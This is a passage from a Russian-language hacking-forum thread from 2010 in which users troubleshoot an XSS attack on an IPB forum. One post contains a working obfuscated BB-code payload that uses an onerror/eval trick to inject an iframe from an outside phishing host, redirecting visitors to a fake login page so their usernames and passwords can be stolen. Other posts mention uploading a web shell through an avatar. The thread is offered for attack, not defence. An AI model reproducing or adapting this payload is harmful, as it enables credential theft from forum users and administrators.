Регистрация Главная Сообщество
Сообщения за день Справка Регистрация

Взлом БД через форум с xss

-

Базы серверов и брут

- Все, что связано с брутом и работой с базами данных

Закрытая тема
 
Опции темы
Старый 04.06.2010, 11:56   #31
 Разведчик
Аватар для towner
 
towner никому не известный тип
Регистрация: 20.01.2010
Сообщений: 2
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

Эм, у меня такая трабла - на фейк перекидывает только если навести курсор на подпись, с чем может быть связано?
 
Старый 04.06.2010, 12:08   #32
Заблокирован
 Рыцарь
Аватар для m0nk
 
m0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компании
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
Отправить сообщение для m0nk с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

то что для ие (первый) так и работает, фейк открываеться при наведении курсора.
 
Старый 04.06.2010, 12:15   #33
Читер-спонсор
 Старший сержант
Аватар для Fix
 
Fix душа компанииFix душа компанииFix душа компанииFix душа компанииFix душа компанииFix душа компанииFix душа компанииFix душа компании
Регистрация: 15.08.2009
Сообщений: 218
Популярность: 1020
Сказал(а) спасибо: 196
Поблагодарили 140 раз(а) в 84 сообщениях
Отправить сообщение для Fix с помощью ICQ Отправить сообщение для Fix с помощью Skype™
 
По умолчанию Re: Взлом БД через форум с xss

Ставьте стандартный скин, увидите подходит под эту тему или нет.
________________
 
Старый 04.06.2010, 14:14   #34
 Разведчик
Аватар для SnOoPKa
 
SnOoPKa никому не известный тип
Регистрация: 03.06.2010
Сообщений: 5
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

Появился значек '> но не перекидывает на фейк.Не перекидывало и по вашей тест ссылке (Просто открывался пользователь) пока она не стала недоступной! Косяк оперы ? Vot kod
PHP код:
[acronym=[acronymstyle=background:url('//'onerrorlol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+1*24*60*60*1000);document.cookie=\x22ipb_my=1234;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://palacheldar.hut2.ru/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]][/acronym][/acronym

Пишется <acronym title= При наведении на '>

Последний раз редактировалось SnOoPKa; 04.06.2010 в 14:31.
 
Старый 04.06.2010, 14:48   #35
 Капитан
Аватар для Excellent18rus
 
Excellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе цену
Регистрация: 07.04.2010
Сообщений: 293
Популярность: 4393
Сказал(а) спасибо: 133
Поблагодарили 334 раз(а) в 187 сообщениях
Отправить сообщение для Excellent18rus с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

первый код перекидывает автоматом, но не на всех браузерах... на новых версиях он уже не пашет...
зато 2ой код пашет везде, НО чтобы он сработал, надо чтобы по нему провели курсором... балуйтесь...

место кода всегда будет '>
ничего страшного...
 
Старый 04.06.2010, 15:02   #36
 Разведчик
Аватар для SnOoPKa
 
SnOoPKa никому не известный тип
Регистрация: 03.06.2010
Сообщений: 5
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
Unhappy Re: Взлом БД через форум с xss

Цитата:
Сообщение от Excellent18rusПосмотреть сообщение
первый код перекидывает автоматом, но не на всех браузерах...

Этот первый код написанно что только для FireFox & IE
Цитата:
Сообщение от Excellent18rusПосмотреть сообщение
2ой код пашет везде, НО чтобы он сработал, надо чтобы по нему провели курсором...

у меня стоит Opera и я вставил второй код, но он не перекидывает!Даже если по нему проводить курсором или нажимать на него... Что можно сделать в таком случае? у меня код правильно вообще записан? Выше постом...
 
Старый 04.06.2010, 15:14   #37
 Разведчик
Аватар для infernale
 
infernale никому не известный тип
Регистрация: 27.09.2009
Сообщений: 6
Популярность: 14
Сказал(а) спасибо: 0
Поблагодарили 2 раз(а) в 2 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от SnOoPKaПосмотреть сообщение
у меня стоит Opera и я вставил второй код, но он не перекидывает!Даже если по нему проводить курсором или нажимать на него... Что можно сделать в таком случае? у меня код правильно вообще записан? Выше постом...

Возможно у тебя уже есть куки
 
Пользователь сказал cпасибо:
m0nk (04.06.2010)
Старый 04.06.2010, 15:27   #38
 Капитан
Аватар для Excellent18rus
 
Excellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе цену
Регистрация: 07.04.2010
Сообщений: 293
Популярность: 4393
Сказал(а) спасибо: 133
Поблагодарили 334 раз(а) в 187 сообщениях
Отправить сообщение для Excellent18rus с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

так. наоборот
1ый по наведению
2ой автоматом - на последних версиях браузера не пашет...
 
Старый 04.06.2010, 15:48   #39
 Разведчик
Аватар для SnOoPKa
 
SnOoPKa никому не известный тип
Регистрация: 03.06.2010
Сообщений: 5
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от infernaleПосмотреть сообщение
Возможно у тебя уже есть куки

нет куков у меня нету

Цитата:
Сообщение от Excellent18rusПосмотреть сообщение
так. наоборот
1ый по наведению
2ой автоматом - на последних версиях браузера не пашет...

Opera Версия 9.52 уже не новая далеко... Ради проверки установил Oper'y Версия 5... всеравно не кидает на фейк
 
Старый 04.06.2010, 16:09   #40
Заблокирован
 Рыцарь
Аватар для m0nk
 
m0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компании
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
Отправить сообщение для m0nk с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от infernaleПосмотреть сообщение
Залил шелл, админки нету, из этого что-то можно выжать?

Непонял вопроса,какой админки?
 
Старый 04.06.2010, 16:18   #41
Заблокирован
 Капитан
Аватар для BlackWinG
 
BlackWinG излучает ауруBlackWinG излучает ауруBlackWinG излучает ауруBlackWinG излучает ауруBlackWinG излучает ауруBlackWinG излучает ауру
Регистрация: 08.04.2010
Сообщений: 279
Популярность: 654
Сказал(а) спасибо: 126
Поблагодарили 277 раз(а) в 113 сообщениях
Отправить сообщение для BlackWinG с помощью ICQ Отправить сообщение для BlackWinG с помощью Skype™
 
По умолчанию Re: Взлом БД через форум с xss

Он имеет ввиду, что там я так понял одни акки только персов, админов акка нету? Так я понял?
 
Старый 04.06.2010, 16:23   #42
 Пехотинец
Аватар для Helko
 
Helko на правильном путиHelko на правильном пути
Регистрация: 18.03.2010
Сообщений: 76
Популярность: 156
Сказал(а) спасибо: 18
Поблагодарили 135 раз(а) в 53 сообщениях
Отправить сообщение для Helko с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от BlackWinGПосмотреть сообщение
Он имеет ввиду, что там я так понял одни акки только персов, админов акка нету? Так я понял?

он иммет ввиду что он просто через аву шелл залил а не через админа
________________
698-1-896
При себе иметь 10+ сообщений. пишем сразу по делу
Раздаю свой парсер для slil.ru тут
 
Старый 04.06.2010, 16:33   #43
 Разведчик
Аватар для sunches
 
sunches на правильном путиsunches на правильном пути
Регистрация: 12.12.2009
Сообщений: 24
Популярность: 149
Сказал(а) спасибо: 143
Поблагодарили 19 раз(а) в 9 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

Можно просто создать темку на форуме и любой вошедший будет перенапрвлен на фейк,я так понял,что можно и не только от админа получить пароль и логин)

Последний раз редактировалось sunches; 04.06.2010 в 16:37.
 
Старый 04.06.2010, 16:35   #44
 Пехотинец
Аватар для Helko
 
Helko на правильном путиHelko на правильном пути
Регистрация: 18.03.2010
Сообщений: 76
Популярность: 156
Сказал(а) спасибо: 18
Поблагодарили 135 раз(а) в 53 сообщениях
Отправить сообщение для Helko с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от sunchesПосмотреть сообщение
Можно просто создать темку на форуме и любой вошедший будет перенапрвлен на фейк,я так понял,что можно и не только от админа полчить пароль и логин)

ну да от любого кто зайдет и введет данные, просто от остальных особого толка не будет
________________
698-1-896
При себе иметь 10+ сообщений. пишем сразу по делу
Раздаю свой парсер для slil.ru тут
 
Старый 04.06.2010, 17:04   #45
Заблокирован
 Разведчик
Аватар для samyrai5
 
samyrai5 на правильном путиsamyrai5 на правильном пути
Регистрация: 02.06.2010
Сообщений: 27
Популярность: 150
Сказал(а) спасибо: 121
Поблагодарили 70 раз(а) в 52 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

как поставить права 777 подскажи а?
 
Закрытая тема


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом сервера через PHP Silence Треп 1 27.09.2010 20:41
Кража аккаунтов через форум (скрипт php) Razzor Подполье Lineage 2 (0 уровень) 1 01.08.2009 00:21

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 23:53.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net